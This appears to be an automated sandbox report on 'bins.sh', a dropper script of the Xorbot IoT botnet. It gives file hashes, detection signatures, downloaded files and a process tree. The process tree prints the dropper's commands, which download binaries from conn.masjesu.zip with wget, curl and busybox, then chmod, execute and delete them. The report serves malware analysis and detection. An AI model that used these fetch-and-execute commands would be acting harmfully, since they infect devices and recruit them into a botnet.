Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    30-11-2024 07:37

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    7f8d56359d16cf11a89348faee5e8201

  • SHA1

    0175abd21fe3c193a9619f45bb01b07de596ed7b

  • SHA256

    ed0eda682b342a2cc9ff34ff241ded67de3d2b00410ee13b0ea98a4f55eefffb

  • SHA512

    208a0a3b03e45bf4e566787cce8a23d9d343f1c0d9fbd6b480f4a551bc7c9e23eaf92e50303725d62657a53c4352b641c10a70cf39178f1f36d2413d887b586b

  • SSDEEP

    96:Y40TL5L5n5abqAHLPjZLqifWGTD3DLDcR5ZUuAu8uC5ZJxpr4XqiRuA8iL8AN5/Y:A/kZaq4B3R1irzs9o47R1irzeQ

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:698
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:702
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:706
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:721
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
          2⤵
          • System Network Configuration Discovery
          PID:729
        • /bin/chmod
          chmod 777 lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
          2⤵
          • File and Directory Permissions Modification
          PID:809
        • /tmp/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
          ./lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
          2⤵
          • Executes dropped EXE
          PID:810
        • /bin/rm
          rm lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu
          2⤵
            PID:812
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:813
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4
            2⤵
            • Reads runtime system information
            • System Network Configuration Discovery
            PID:814

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/9vDkO9CDqBo1kDE5suzm02WSsEANaggiE4

          Filesize

          141KB

          MD5

          3ca8decdb1e52c423c521bfff02ac200

          SHA1

          8621ecd6807109b8541912ad9e134f6fb49bfd48

          SHA256

          dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

          SHA512

          b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

        • /tmp/lgaMk3RYz9H9SOCAFRuLdrGM9wYjZHzYIu

          Filesize

          177KB

          MD5

          786d75a158fe731feca3880f436082c0

          SHA1

          79ea2734e43d00cdeabed5586b2c1994d02aef3e

          SHA256

          5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

          SHA512

          7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f